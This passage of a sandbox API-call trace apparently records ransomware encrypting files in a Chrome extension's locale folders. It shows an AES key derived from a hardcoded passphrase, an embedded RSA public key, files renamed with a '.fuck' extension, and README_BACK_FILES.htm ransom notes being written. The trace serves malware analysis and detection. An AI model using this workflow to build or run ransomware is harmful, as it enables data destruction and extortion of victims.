pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.095] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.095] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10358) returned 1 [0255.096] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10358, dwCertEncodingType=0x1, pInfo=0x2990210*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990240*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990248*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18c68) returned 1 [0255.096] CryptEncrypt (in: hKey=0x2e18c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.096] CryptEncrypt (in: hKey=0x2e18c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e109b8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e109b8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.096] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e109b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e109b8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.097] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x25f, lpOverlapped=0x0) returned 1 [0255.100] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x25f, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x260) returned 1 [0255.100] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x260, lpOverlapped=0x0) returned 1 [0255.107] CloseHandle (hObject=0x5d60) returned 1 [0255.107] CloseHandle (hObject=0x5d5c) returned 1 [0255.107] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), bFailIfExists=0) returned 1 [0255.111] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json", dwFileAttributes=0x0) returned 1 [0255.111] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.gsg")) returned 1 [0255.113] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.fuck")) returned 1 [0255.114] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.114] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.114] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.114] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.114] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.114] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\readme_back_files.htm")) returned 0xffffffff [0255.114] AreFileApisANSI () returned 1 [0255.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.115] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.115] GetFileType (hFile=0x5d50) returned 0x1 [0255.115] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.117] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.117] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.117] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.117] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.117] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.117] GetLastError () returned 0x0 [0255.117] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json")) returned 0x20 [0255.117] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json", dwFileAttributes=0x80) returned 1 [0255.118] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.118] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.120] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.121] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.123] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.123] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.123] CryptHashData (hHash=0x2e18828, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.123] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.123] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.123] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.123] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10688) returned 1 [0255.124] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10688, dwCertEncodingType=0x1, pInfo=0x29907c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29907f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29907f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18d28) returned 1 [0255.124] CryptEncrypt (in: hKey=0x2e18d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.124] CryptEncrypt (in: hKey=0x2e18d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e108a8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e108a8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.124] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e108a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e108a8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.125] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x147, lpOverlapped=0x0) returned 1 [0255.126] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x147, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0255.126] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0255.126] CloseHandle (hObject=0x5d5c) returned 1 [0255.126] CloseHandle (hObject=0x5d60) returned 1 [0255.127] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), bFailIfExists=0) returned 1 [0255.130] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json", dwFileAttributes=0x0) returned 1 [0255.130] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.gsg")) returned 1 [0255.131] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.fuck")) returned 1 [0255.133] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.133] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.133] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.133] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.133] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.133] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\readme_back_files.htm")) returned 0xffffffff [0255.133] AreFileApisANSI () returned 1 [0255.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4618, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.133] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.134] GetFileType (hFile=0x5d50) returned 0x1 [0255.134] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.136] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.136] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.137] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.137] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.137] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.138] GetLastError () returned 0x0 [0255.138] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json")) returned 0x20 [0255.138] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json", dwFileAttributes=0x80) returned 1 [0255.138] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.139] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.140] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.140] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.142] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.142] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.142] CryptHashData (hHash=0x2e18828, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.142] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.142] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.143] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.143] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10a40) returned 1 [0255.143] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10a40, dwCertEncodingType=0x1, pInfo=0x2990960*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990990*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990998*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18d68) returned 1 [0255.143] CryptEncrypt (in: hKey=0x2e18d68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.143] CryptEncrypt (in: hKey=0x2e18d68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e103e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e103e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.143] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e103e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e103e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.144] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd9, lpOverlapped=0x0) returned 1 [0255.146] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd9, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0255.146] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0255.146] CloseHandle (hObject=0x5d60) returned 1 [0255.146] CloseHandle (hObject=0x5d5c) returned 1 [0255.146] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), bFailIfExists=0) returned 1 [0255.150] SetFileAttributesA 